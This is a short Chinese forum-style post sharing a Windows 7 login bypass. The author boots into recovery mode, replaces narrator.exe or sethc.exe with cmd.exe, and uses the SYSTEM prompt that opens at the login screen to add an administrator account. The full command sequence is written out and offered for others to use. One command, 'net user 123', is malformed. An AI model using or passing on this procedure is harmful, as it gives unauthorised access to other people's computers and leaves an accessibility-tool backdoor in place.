其实这个方法很多人都知道，不过最近尝试了破解最新的win7 64发现依然有效，给不知道的朋友分享下


其思路就是替换讲述人narrator.exe（或者粘滞键sethc.exe）注意，各个系统可能不太一样，注意扩展思维。


win7 下唯一的难点就是怎么替换了，试了pe，权限不够，也改不了，算了，估计盘有问题，那么去win7 新出的 修复模式看看吧^_^

开机，F8，修复模式，用户选择administrator，密码为空，进入后选命令提示符那项，后面就不用我说了吧？O(∩_∩)O哈哈~


不过唯一注意的一点是，这里虽然是system权限，比安全模式中要高，但是默认所在盘符并非系统盘（虽然也有windows文件夹）！请自行切换到系统盘，

cd /d D:\windows\system32

copy narrator.exe narrator2.exe

del narrator.exe

copy cmd.exe narrator.exe

(同理可以替换sethc.exe)


然后重启，登陆页面调出讲述人，就会有system权限的cmd，呵呵，

net user login007 /add

net user 123

net localgroup Administrators login007 /add
或者直接 net user administrator /active:y
注意：之所以不在修复模式下直接用net user administrator /active:y 的方式启用，原因是里面修改的并非硬盘上系统分区的密码！

?

?